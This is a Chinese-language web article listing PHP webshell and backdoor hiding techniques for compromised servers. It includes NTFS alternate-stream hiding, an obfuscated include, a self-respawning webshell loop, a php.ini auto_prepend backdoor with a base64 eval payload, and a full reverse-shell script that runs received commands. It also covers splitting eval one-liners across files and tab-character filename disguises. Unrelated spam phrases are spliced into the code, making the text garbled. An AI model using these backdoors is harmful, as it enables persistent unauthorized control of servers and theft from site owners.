php常见后门,php后门隐藏技巧⼤全
1. attrib +s +h
创建系统隐藏⽂件:
attrib +s +a +r +h
attrib +s +h ⽂件名
在 Windows 10下即使开启了显⽰隐藏的项⽬,或dir仍然看不见。
2. 利⽤ ADS 隐藏⽂件
NTFS交换数据流(Alternate Data Streams,简称 ADS)是 NTFS 磁盘格式的⼀个特性,在 NTFS⽂件系统下,每个⽂件都可以存在多个数据流。通俗的理解,就是其它⽂件可以“寄宿”在某个⽂件⾝上,⽽
在资源管理器中却只能看到宿主⽂件,不到寄宿⽂件。利⽤ADS 数据流,我们可以做很多有趣的事情。(抄的)
⾸先创建 ADS 隐藏⽂件
在命令⾏,echo ⼀个数据流进去,⽐如 index ⽂件是正常⽂件。
echo ^ > index.php:shell.jpg
这样就⽣成了⼀个不可见的 index.php:shell.jpg
使⽤dir /r查看
可使⽤命令直接修改,要删除的话 直接删除 index.php就ok了
第⼆步,直接使⽤正常⽂件包含。
做⼀些免杀
把 index.php:shell.jpg hex 编码
$a="696E6465782E7068703A7368656C6C2E6A7067";
// index.php:shell.jpg hex编码
$b="a";
include(PACK('H*',$$b))
>
3.php环境变量留shell
在c盘创建这个⽬录
丢个图⽚⼀句话
然后⽂件包含,就好。为了隐蔽可以包含图⽚码,txt等。
4.不死马
运⾏后,会删除⾃⾝,⽣成⼀个 webshell.php,管理员删除后还会⽣成。set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('webshell.php','');
sleep(5);
}
解决覆盖重写或者重启 web 服务删掉即可。set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('webshell.php','clear');
sleep(1);
}
五. php.ini后门
将下⾯后门写⼊php.iniallow_url_include=On
auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"
// base64
// 后门类型可⾃⼰修改。
这些做好后,重启 web 服务就好了。
⽅法1. 如果权限很⼤的话,⾃⼰⼿动重启,缺点容易暴露,重启服务,就要上服务器,某⾥的服务器,异地登陆有短信提醒。⽅法2.就是加载⼀个 php_socke.php 脚本,让它重新加载 php.ini
此后门,任何php都可菜⼑连接/******************************/
/* 只适⽤于windows系统 */
/******************************/
while(true){//别问我为什么要死循环,我也不清楚,只有设置成死循环才能加载新的 php.ini ...
汽车车牌@set_time_limit(0);
$system=strtoupper(substr(PHP_OS,0,3));
if(!extension_loaded('sockets'))
{
if($system=='WIN'){@dl('php_sockets.dll')ordie("Can't load socket");}
}
$host='255.255.255.255';// 搞⼀个不存在的ip,万⼀给⼈家反弹过去了岂不是很尴尬了~~~
qq游戏修复工具$port=1998;//别问我为什么是1998,问了我也不会告诉你....
if($system=="WIN"){$env=array('path'=>'c:windowssystem32');}
$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"),);
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket创建失败");}
if(($ret=@socket_connect($sock,$host,$port))<0){die("连接失败");}
else{
$message="PHP反弹连接n";
@socket_write($sock,$message,strlen($message));
$cwd=str_replace('','/',dirname(__FILE__));
while($cmd=@socket_read($sock,65535,$proto))
{
if(trim(strtolower($cmd))=="exit"){
socket_write($sock,"Byen");exit;
西安初中排名
}else{
$process=proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
一斤废铜多少钱if(is_resource($process)){
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg=stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
$return_value=proc_close($process);
}
}
}
}
}
>
//此脚本⾮百分百成功
6. 关键字拆分,多⽂件包含!
⽐如⼀句话:@eval($_POST['x']);我们可以写成$a=$_POST['x'];@eval($a);我们可以将 $a=$_POST['x'];写⼊⼀个⽂件 POST.php
然后在 @eval($a); ⼀句话的上⽅使⽤ include "POST.php";的⽅式引⽤!
7.将真正的⼀句话写⼊数据库
当我们发现源码有个地⽅执⾏了数据库操作,那我们就可以改源码和数据库啦~⽐如,修改成 eval(查出的数据);
8.以下是linux的
⽆意中发现的。具体看代码。
$webpath = dirname(__FILE__)."/";
file_put_contents($webpath ."guige.jpg".chr(9).".php","保存的内容(⽐如写
个⼀句话)");
>
⽣成⼀个⽂件。
在⽬录下看到是显⽰ 名字为 guige.jpg
但是 web 浏览 却发现 没有到 guige.jpg 后来发现 需要添 guige.jpg%09.php 这样
助理工程师评定条件的话就导致我们可以对后门隐藏了。。管理员看到的是.jpg 我们却可以 web ⽤.php 解析来连接。。。有⽤的到的可以看看。
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论